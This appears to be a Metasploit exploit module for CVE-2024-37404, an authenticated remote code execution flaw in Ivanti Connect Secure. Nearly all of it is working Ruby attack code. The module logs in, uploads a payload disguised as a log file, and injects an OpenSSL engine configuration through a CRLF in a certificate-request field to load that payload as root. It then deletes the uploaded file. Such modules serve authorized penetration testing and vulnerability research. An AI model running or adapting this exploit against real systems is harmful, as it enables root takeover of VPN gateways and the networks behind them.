Share
## https://sploitus.com/exploit?id=MSF:EXPLOIT-LINUX-HTTP-IVANTI_CONNECT_SECURE_RCE_CVE_2024_37404-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  class IvantiError < StandardError; end
  class IvantiNoAccessError < IvantiError; end
  class IvantiNotFoundError < IvantiError; end
  class IvantiUnexpectedResponseError < IvantiError; end
  class IvantiUnknownError < IvantiError; end

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Ivanti Connect Secure Authenticated Remote Code Execution via OpenSSL CRLF Injection',
        'Description' => %q{
          This module exploits a CRLF injection vulnerability in Ivanti Connect
          Secure to achieve remote code execution (CVE-2024-37404). Versions
          prior to 22.7R2.1 are vulnerable. Note that Ivanti Policy Secure
          versions prior to 22.7R1.1 are also vulnerable but this module
          doesn't support this software.

          Valid administrative credentials are required. A non-administrative
          user is also required and can be created using the administrative
          account, if needed.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Richard Warren', # Vulnerability discovery and PoC
          'Christophe De La Fuente', # Metasploit Module
        ],
        'References' => [
          ['CVE', '2024-37404'],
          ['URL', 'https://attackerkb.com/topics/FI5vcuGwyM/cve-2024-37404'],
          ['URL', 'https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Connect-Secure-and-Policy-Secure-CVE-2024-37404'],
          ['URL', 'https://blog.amberwolf.com/blog/2024/october/cve-2024-37404-ivanti-connect-secure-authenticated-rce-via-openssl-crlf-injection/']
        ],
        'DisclosureDate' => '2024-10-08',
        'Platform' => 'linux',
        'Arch' => ARCH_X86, # OpenSSL running on the appliance is an x86 binary which requires the payload to be ARCH_x86
        'Privileged' => true, # Administrative access is needed and code execution as root.
        'Targets' => [
          ['Automatic', {}]
        ],
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true
        },
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS, ACCOUNT_LOGOUT]
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path of the Ivanti Connect Secure web interface', '/']),
        OptString.new('ADMIN_USERNAME', [true, 'Administrative username to authenticate with.']),
        OptString.new('ADMIN_PASSWORD', [true, 'Administrator password to authenticate with.']),
        OptString.new('USERNAME', [true, 'Normal user username to authenticate with.']),
        OptString.new('PASSWORD', [true, 'Normal user password to authenticate with.'])
      ]
    )

    @logged = false
  end

  def confirm_login_admin(uri)
    res = send_request_cgi('method' => 'GET', 'uri' => uri, 'keep_cookies' => 'true')
    raise IvantiUnknownError, "[confirm_login_admin] No response from '#{uri}'" if res.nil?

    csrf_token = res.get_html_document.xpath('//form/input[@name="xsauth"]/@value').text
    raise IvantiNotFoundError, '[confirm_login_admin] Could not find the CSRF token' if csrf_token.empty?

    form_data_str = res.get_html_document.xpath('//form/input[@id="DSIDFormDataStr"]/@value').text
    raise IvantiNotFoundError, '[confirm_login_admin] Could not find the FormDataStr token' if form_data_str.empty?

    uri = normalize_uri(target_uri.path, '/dana-na/auth/url_admin/login.cgi')
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => uri,
      'keep_cookies' => 'true',
      'vars_post' => {
        'btnContinue' => 'Continue the session',
        'FormDataStr' => form_data_str,
        'xsauth' => csrf_token
      }
    )
    raise IvantiUnknownError, "[confirm_login_admin] No response from '#{uri}'" if res.nil?

    res
  end

  def login_admin
    print_status(
      "Login to the administrative interface with username '#{datastore['ADMIN_USERNAME']}' and password "\
      "'#{datastore['ADMIN_PASSWORD']}'..."
    )

    uri = normalize_uri(target_uri.path, '/dana-na/auth/url_admin/welcome.cgi')
    res = send_request_cgi('method' => 'GET', 'uri' => uri, 'keep_cookies' => 'true')
    raise IvantiUnknownError, "[login_admin] No response from '#{uri}'" if res.nil?

    csrf_token = res.get_html_document.xpath('//form/input[@id="xsauth_token"]/@value').text
    raise IvantiNotFoundError, '[login_admin] Could not find the CSRF token' if csrf_token.empty?

    uri = normalize_uri(target_uri.path, '/dana-na/auth/url_admin/login.cgi')
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => uri,
      'keep_cookies' => 'true',
      'vars_post' => {
        'tz_offset' => (60 * rand(0..8)).to_s,
        'xsauth_token' => csrf_token,
        'username' => datastore['ADMIN_USERNAME'],
        'password' => datastore['ADMIN_PASSWORD'],
        'realm' => 'Admin Users',
        'btnSubmit' => 'Sign In'
      }
    )
    raise IvantiUnknownError, "[login_admin] No response from '#{uri}'" if res.nil?

    if res.code == 302 && res.redirection.to_s == normalize_uri(target_uri.path, '/dana-na/auth/url_admin/welcome.cgi?p=admin%2Dconfirm')
      print_warning("The admin #{datastore['ADMIN_USERNAME']} is already logged in")
      res = confirm_login_admin(normalize_uri(target_uri.path, res.redirection.to_s))
    end

    if res.code != 302 || res.redirection.to_s != normalize_uri(target_uri.path, '/dana-admin/misc/admin.cgi')
      raise IvantiNoAccessError, "[login_admin] Login failed (username: #{datastore['ADMIN_USERNAME']}, password: #{datastore['ADMIN_PASSWORD']})"
    end
  end

  def get_version
    print_status('Getting the version...')

    uri = normalize_uri(target_uri.path, '/dana-admin/sysinfo/sysinfo.cgi')
    res = send_request_cgi('method' => 'GET', 'uri' => uri, 'keep_cookies' => 'true')
    raise IvantiUnknownError, "[get_version] No response from '#{uri}'" if res.nil?

    version_str = res.get_html_document.xpath('//span[@id="DSIDSystemSoftwarePkgVersion"]').text
    raise IvantiNotFoundError, '[get_version] Could not find the version number' if version_str.empty?

    print_good("Found version #{version_str}")
    unless version_str.match(/(\d+\.[\dR]+)/)
      raise IvantiNotFoundError, "[get_version] Unexpected version number format: #{version_str}"
    end

    Rex::Version.new(Regexp.last_match(1))
  end

  def check
    begin
      login_admin
      @logged = true
    rescue IvantiError => e
      return CheckCode::Unknown("Unable to login to the administrative interface: #{e}")
    end

    begin
      version = get_version
    rescue IvantiError => e
      return CheckCode::Detected("Version number not found: #{e}")
    end

    unless version < Rex::Version.new('22.7R2.1')
      return CheckCode::Safe("Version number: #{version}")
    end

    return CheckCode::Appears
  end

  def confirm_login_user(uri)
    res = send_request_cgi('method' => 'GET', 'uri' => uri, 'keep_cookies' => 'true')
    raise IvantiUnknownError, "[login_user] No response from '#{uri}'" if res.nil?

    form_data_str = res.get_html_document.xpath('//form/input[@id="DSIDFormDataStr"]/@value').text
    raise IvantiNotFoundError, '[login_user] Could not find the FormDataStr token' if form_data_str.empty?

    uri = normalize_uri(target_uri.path, '/dana-na/auth/url_default/login.cgi')
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => uri,
      'keep_cookies' => 'true',
      'vars_post' => {
        'btnContinue' => 'Continue the session',
        'FormDataStr' => form_data_str
      }
    )
    raise IvantiUnknownError, "[login_user] No response from '#{uri}'" if res.nil?

    res
  end

  def login_user
    print_status(
      "Login to the user interface with username '#{datastore['USERNAME']}' and password "\
      "'#{datastore['PASSWORD']}'..."
    )

    uri = normalize_uri(target_uri.path, '/dana-na/auth/url_default/login.cgi')
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => uri,
      'keep_cookies' => 'true',
      'vars_post' => {
        'tz_offset' => '',
        'win11' => '',
        'clientMAC' => '',
        'username' => datastore['USERNAME'],
        'password' => datastore['PASSWORD'],
        'realm' => 'Users',
        'btnSubmit' => 'Sign In'
      }
    )
    raise IvantiUnknownError, "[login_user] No response from '#{uri}'" if res.nil?

    if res.code == 302 && res.redirection.to_s == normalize_uri(target_uri.path, '/dana-na/auth/url_default/welcome.cgi?p=user%2Dconfirm')
      print_warning("User #{datastore['USERNAME']} is already logged in.")
      res = confirm_login_user(normalize_uri(target_uri.path, res.redirection.to_s))
    end

    if res.code != 302 && res.redirection.to_s != normalize_uri(target_uri.path, '/dana/home/starter0.cgi?check=yes')
      raise IvantiNoAccessError, "[login_user] Login failed (username: #{datastore['USERNAME']}, password: #{datastore['PASSWORD']})"
    end
  end

  def upload_log
    print_status('Uploading the log file...')

    @client_component = "Log_#{rand_text_numeric(3)}"
    uri = normalize_uri(target_uri.path, "/dana/uploadlog/uploadlog.cgi?client_component=#{@client_component}")
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => uri,
      'keep_cookies' => 'true',
      'vars_form_data' => [
        {
          'name' => 'uploaded_file',
          'data' => Msf::Util::EXE.to_linux_x86_elf_dll(framework, payload.encoded),
          'content_type' => 'application/octet-stream',
          'encoding' => 'binary',
          'filename' => 'LULogUpload.zip'
        }
      ]
    )
    raise IvantiUnknownError, "[upload_log] No response from '#{uri}'" if res.nil?

    unless res.code == 200
      raise IvantiUnexpectedResponseError, "[upload_log] Server responded with an unexpected HTTP status code: #{res.code}"
    end
  end

  def get_log_filename
    print_status('Getting the log file name...')

    uri = normalize_uri(target_uri.path, '/dana-admin/auth/uploadedlogs.cgi')
    res = send_request_cgi('method' => 'GET', 'uri' => uri, 'keep_cookies' => 'true')
    raise IvantiUnknownError, "[get_log_filename] No response from '#{uri}'" if res.nil?

    log_filename = res.get_html_document.xpath("//table[@id='table_uploadedlogs_4']//tr/td[contains(text(), '#{@client_component}')]/preceding-sibling::td/a").text.strip
    raise IvantiNotFoundError, '[get_log_filename] Could not find the log filename' if log_filename.empty?

    log_filename
  end

  def upload_payload
    print_status('Uploading the payload...')

    cookie_jar_bak = cookie_jar.dup
    cookie_jar.clear
    login_user
    begin
      upload_log
    ensure
      print_status('Logging the user out...')

      uri = normalize_uri(target_uri.path, '/dana-na/auth/logout.cgi')
      res = send_request_cgi('method' => 'GET', 'uri' => uri)
      print_warning("Unable to logout: no response from '#{uri}'") if res.nil?
    end
    self.cookie_jar = cookie_jar_bak
    get_log_filename
  end

  def trigger_payload
    print_status('Triggering the payload...')

    uri = normalize_uri(target_uri.path, '/dana-admin/cert/admincert.cgi')
    res = send_request_cgi('method' => 'GET', 'uri' => uri, 'keep_cookies' => 'true')
    raise IvantiUnknownError, "[trigger_payload] No response from '#{uri}'" if res.nil?

    csrf_token = res.get_html_document.xpath('//form/input[@id="xsauth_71"]/@value').text
    raise IvantiNotFoundError, '[trigger_payload] Could not find the CSRF token' if csrf_token.empty?

    engine_name = rand_text_alpha_lower(3..5)
    config_section = rand_text_alpha_lower(5..10)
    openssl_config = <<~CONF
      [default]
      openssl_conf = openssl_init
      [openssl_init]
      engines = engine_section
      [engine_section]
      #{engine_name} = #{config_section}
      [#{config_section}]
      engine_id = #{engine_name}
      dynamic_path = /home/runtime/uploadlog/#{@log_filename}
      init = 0
    CONF
    # Expecting no response
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/dana-admin/cert/admincertnewcsr.cgi'),
      'keep_cookies' => 'true',
      'headers' => {
        'Referer' => full_uri('/dana-admin/cert/admincert.cgi')
      },
      'vars_post' => {
        'xsauth' => csrf_token,
        'commonName' => Faker::Company.department,
        'organizationName' => Faker::Company.name,
        'organizationalUnitName' => Faker::Company.department,
        'localityName' => "#{Faker::Address.city}\n#{openssl_config}",
        'stateOrProvinceName' => Faker::Address.state,
        'countryName' => Faker::Address.country_code,
        'emailAddress' => Faker::Internet.email,
        'keytype' => 'RSA',
        'keylength' => '1024',
        'eccurve' => 'prime256v1',
        'random' => rand_text_alphanumeric(5..10),
        'newcsr' => 'yes',
        'certType' => 'device',
        'btnCreateCSR' => 'Create CSR'
      }
    }, 1)
  end

  def exploit
    unless @logged
      begin
        login_admin
      rescue IvantiError => e
        fail_with(Failure::NoAccess, "Unable to login to the administrative interface: #{e}")
      end
    end

    begin
      @log_filename = upload_payload
    rescue IvantiError => e
      fail_with(Failure::Unknown, "Unable to upload the payload: #{e}")
    end

    begin
      trigger_payload
    rescue IvantiError => e
      fail_with(Failure::Unknown, "Unable to trigger the payload: #{e}")
    end
  end

  def delete_log_file
    print_status('Deleting the log file (payload)...')

    uri = normalize_uri(target_uri.path, '/dana-admin/auth/uploadedlogs.cgi')
    res = send_request_cgi('method' => 'GET', 'uri' => uri, 'keep_cookies' => 'true')
    raise IvantiUnknownError, "[delete_log_file] No response from '#{uri}'" if res.nil?

    csrf_token = res.get_html_document.xpath('//form/input[@id="xsauth_60"]/@value').text
    raise IvantiNotFoundError, '[delete_log_file] Could not find the CSRF token' if csrf_token.empty?

    file_link = res.get_html_document.xpath("//table[@id='table_uploadedlogs_4']//tr/td[contains(text(), '#{@client_component}')]/preceding-sibling::td/a")
    raise IvantiNotFoundError, '[delete_log_file] Could not find the log file' if file_link.empty?

    href = file_link.attribute('href')&.value
    if href&.match(/&row=(\d+)/)
      log_id = Regexp.last_match(1)
    else
      raise IvantiNotFoundError, '[delete_log_file] Unable to retrieve the log ID'
    end

    uri = normalize_uri(target_uri.path, '/dana-admin/auth/uploadedlogs.cgi')
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => uri,
      'keep_cookies' => 'true',
      'headers' => {
        'Referer' => full_uri('/dana-admin/auth/uploadedlogs.cgi')
      },
      'vars_post' => {
        'xsauth' => csrf_token,
        'op' => 'del',
        'row' => log_id
      }
    )
    raise IvantiUnknownError, "[delete_log_file] No response from '#{uri}'" if res.nil?

    if res.code != 302 || res.redirection.to_s != normalize_uri(target_uri.path, '/dana-admin/auth/uploadedlogs.cgi')
      raise IvantiUnexpectedResponseError, "[delete_log_file] Unable to delete the log file (status code=#{res.code})"
    end

    csrf_token
  end

  def on_new_session(_session)
    print_status('Cleaning up...')

    begin
      csrf_token = delete_log_file
    rescue IvantiError => e
      print_warning(
        "Unable to cleanup properly, the log file ('/home/runtime/uploadlog/#{@log_filename}') "\
        "will need to be deleted manually: #{e}"
      )
    end

    print_status('Logging the administrator out...')

    uri = normalize_uri(target_uri.path, '/dana-na/auth/logout.cgi')
    res = send_request_cgi('method' => 'GET', 'uri' => uri, 'vars_get' => { 'xsauth' => csrf_token })
    print_warning("Unable to logout: no response from '#{uri}'") if res.nil?
  end

end